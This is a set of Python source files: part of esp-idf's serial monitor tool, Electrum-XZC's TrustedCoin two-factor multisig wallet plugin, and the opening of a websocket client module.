def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
cmd = ["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file]
process = subprocess.Popen(cmd, cwd=".")
process.wait()
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except Exception:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except Exception:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [0, 4, 2, 6, 1, 5, 3, 7]
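    # Illustrative example: the sequence b'\033[1;31m' (bold red) matches RE_ANSI_COLOR
    # with group(1) == b'1' and group(2) == b'1', so it maps to the Windows color
    # ANSI_TO_WINDOWS_COLOR[1] == 4 combined with FOREGROUND_INTENSITY.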
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
        Ironically, on Windows this console output is normally wrapped by winpty, which will then detect the console text
        color changes and convert them back to ANSI color codes for MSYS' terminal to display. However, this is the
        least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output=None, decode_output=False):
self.output = output
self.decode_output = decode_output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
if self.decode_output:
self.output.write(data.decode())
else:
self.output.write(data)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1136
pass
def write(self, data):
if isinstance(data, bytes):
data = bytearray(data)
else:
data = bytearray(data, 'utf-8')
for b in data:
b = bytes([b])
length = len(self.matched)
if b == b'\033': # ESC
self.matched = b
elif (length == 1 and b == b'[') or (1 < length < 7):
self.matched += b
if self.matched == ANSI_NORMAL.encode('latin-1'): # reset console
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum_xzc import ecc, constants, keystore, version, bip32, bitcoin
from electrum_xzc.bitcoin import TYPE_ADDRESS
from electrum_xzc.bip32 import BIP32Node, xpub_type
from electrum_xzc.crypto import sha256
from electrum_xzc.transaction import TxOutput
from electrum_xzc.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum_xzc.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum_xzc.i18n import _
from electrum_xzc.plugin import BasePlugin, hook
from electrum_xzc.util import NotEnoughFunds, UserFacingException
from electrum_xzc.storage import STO_EV_USER_PW
from electrum_xzc.network import Network
from electrum_xzc.base_wizard import BaseWizard
from electrum_xzc.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
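# Illustrative call sketch (identifiers are placeholders and a running Network instance
# is assumed; this block is not part of the original module):
#   tos_text = server.get_terms_of_service()
#   billing = server.get(short_id)                  # billing info for an existing cosigner
#   result = server.sign(short_id, raw_tx_hex, otp) # co-sign a partially signed transaction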
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.storage.get('trustedcoin_billing_addresses', {}),
'segwit': self.storage.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address_segwit']
fee_output = TxOutput(TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
                # TrustedCoin won't charge if the total input value is
                # lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize()
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.storage.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
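# Illustrative flow (a sketch using the helpers above; 'wallet' and 'n' are placeholders):
# the address the server should bill to at billing index n can be recomputed client-side as
#   expected = make_billing_address(wallet, n, addr_type='segwit')
# which derives make_xpub(get_billing_xpub(), long_user_id) and then a public child at [n],
# so billing addresses received from the server can be verified locally.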
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(str(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
        # old versions used long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
        # this overrides the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
_wsio.py
|
# -*- coding: utf-8 -*-
from ._events import EventEmitter
import websocket
import Queue as queue
import _packet
import threading
import signal
import six
original_signal_handler = None
connected_clients = []
OPCODE_CONT = 0x0
